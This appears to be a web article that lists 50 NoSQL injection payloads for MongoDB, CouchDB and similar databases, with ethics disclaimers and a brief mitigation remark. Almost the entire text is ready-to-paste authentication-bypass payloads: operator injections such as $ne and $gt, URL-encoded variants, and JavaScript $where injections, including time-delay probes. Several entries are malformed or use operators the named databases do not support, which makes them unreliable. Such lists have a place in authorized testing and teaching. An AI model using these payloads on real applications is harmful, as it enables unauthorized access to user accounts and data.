NoSQL injection is a technique used to exploit vulnerabilities in NoSQL databases by injecting malicious code into queries, similar to SQL injection but tailored to NoSQL query syntax like MongoDB, Cassandra, or CouchDB. Below is a list of 50 example payloads that could be used to test for NoSQL injection vulnerabilities. Warning: These payloads are for educational and testing purposes only, in controlled environments with explicit permission. Unauthorized use is illegal and unethical.
Note: The payloads are generalized and may need adaptation depending on the NoSQL database (e.g., MongoDB, CouchDB) and the application’s query structure. Always test responsibly in a legal, authorized environment.
MongoDB-Specific NoSQL Injection Payloads
MongoDB often uses JSON-like query syntax, so payloads target operators like $ne, $eq, $gt, $regex, etc.
{"username": {"$ne": null}, "password": {"$ne": null}}- Bypasses authentication by checking for non-null username/password.{"username": "admin", "password": {"$gt": ""}}- Attempts to match any password greater than an empty string.{"username": {"$eq": "admin"}, "password": {"$exists": true}}- Checks if the username is “admin” and password exists.{"$or": [{"username": "admin"}, {"password": "anything"}]}- Uses$orto bypass authentication logic.{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "wrong"}}- Tests multiple usernames with a not-equal condition.{"username": {"$regex": ".*admin.*"}, "password": {"$ne": null}}- Uses regex to match usernames containing “admin”.{"username": {"$eq": "admin"}, "password": {"$type": 2}}- Targets string-type passwords.{"username": {"$gt": ""}, "password": {"$gt": ""}}- Matches any non-empty username and password.{"$where": "this.username == 'admin'"}- Uses JavaScript-based$whereclause to bypass checks.{"username": {"$ne": ""}, "password": {"$regex": "^.*$"}}- Matches any non-empty username and any password.{"username": {"$eq": "admin"}, "password": {"$nin": ["invalid"]}}- Excludes specific invalid passwords.{"username": "admin';return true;//", "password": "anything"}- JavaScript injection for$wherequeries.{"username": {"$regex": "^a"}, "password": {"$exists": true}}- Matches usernames starting with “a”.{"$and": [{"username": "admin"}, {"password": {"$ne": "wrong"}}]}- Combines conditions to bypass logic.{"username": {"$eq": "admin"}, "password": {"$size": 0}}- Targets empty password arrays.{"username": {"$not": {"$eq": "guest"}}, "password": {"$ne": null}}- Excludes “guest” usernames.{"username": {"$all": ["admin"]}, "password": {"$gt": ""}}- Matches specific username arrays.{"username": {"$regex": "admin", "$options": "i"}, "password": {"$ne": null}}- Case-insensitive username match.{"username": {"$elemMatch": {"$eq": "admin"}}, "password": {"$ne": ""}}- Targets array elements.{"$where": "this.password.length > 0"}- JavaScript to check non-empty passwords.
General NoSQL Injection Payloads
These payloads target common NoSQL databases or generic query structures.
username=admin&password[$ne]=null- URL-encoded payload for bypassing authentication.username=admin&password[$gt]=- Empty$gtto match any password.username[$eq]=admin&password[$exists]=true- Checks for existing passwords.username[$regex]=.*admin.*&password[$ne]=null- Regex-based username match.username=admin&password[$in][]=valid&password[$in][]=invalid- Tests multiple password values.username[$ne]=guest&password[$ne]=null- Excludes guest users.username[$or][][username]=admin&username[$or][][password]=anything- OR condition in URL.username[$eq]=admin&password[$type]=string- Targets string-type passwords.username=admin&password[$regex]=^.*$- Matches any password.username[$not][$eq]=user&password[$ne]=null- Excludes specific usernames.
JavaScript Injection Payloads
For databases supporting JavaScript (e.g., MongoDB $where).
{"$where": "return true"}- Always-true condition to bypass authentication.{"$where": "this.username == 'admin' && this.password != 'wrong'"}- Specific username/password check.{"$where": "sleep(1000);return true"}- Tests for JavaScript execution delay.{"$where": "this.password == this.password"}- Trivial true condition.{"$where": "this.username.length > 0"}- Matches non-empty usernames.username=admin';sleep(1000);//&password=anything- JavaScript delay injection.{"$where": "this.username.match(/admin/)}- Regex-based username match in JavaScript.{"$where": "this.password == 'admin' || true"}- Forces true with OR.{"$where": "function(){return true;}"}- Anonymous function to return true.{"$where": "this.username == 'admin' && 1==1"}- Adds trivial true condition.
CouchDB/Cassandra/Other NoSQL Payloads
These target other NoSQL databases with different query structures.
{"key": {"$eq": "admin"}, "value": {"$ne": null}}- CouchDB-style key-value injection.{"selector": {"username": "admin", "password": {"$gt": ""}}}- CouchDB selector query.{"selector": {"$or": [{"username": "admin"}, {"password": "test"}]}}- CouchDB OR condition.username[$eq]=admin&password[$gt]=0- Numeric comparison for Cassandra.{"query": "username = 'admin' OR 1=1"}- Generic OR injection.{"filter": {"username": {"$contains": "admin"}}}- Filter-based injection.{"username": {"$eq": "admin"}, "password": {"$isNotNull": true}}- Non-null check.{"query": {"username": {"$like": "%admin%"}}}- LIKE-style pattern matching.{"username": {"$in": ["admin", "root"]}, "password": {"$exists": true}}- Multi-user check.{"selector": {"username": {"$regex": ".*"}, "password": {"$ne": null}}}- Broad regex match.
Notes
- Context-Specific: Payloads must be tailored to the database (e.g., MongoDB uses
$ne, CouchDB usesselector). Test the database type first. - Encoding: For web applications, payloads may need URL or JSON encoding (e.g.,
[$ne]becomes%5B%24ne%5D). - Ethical Use: Only test systems you own or have explicit permission to test. Unauthorized testing is illegal.
- Mitigation: Developers should sanitize inputs, use parameterized queries, and avoid exposing query operators to user input.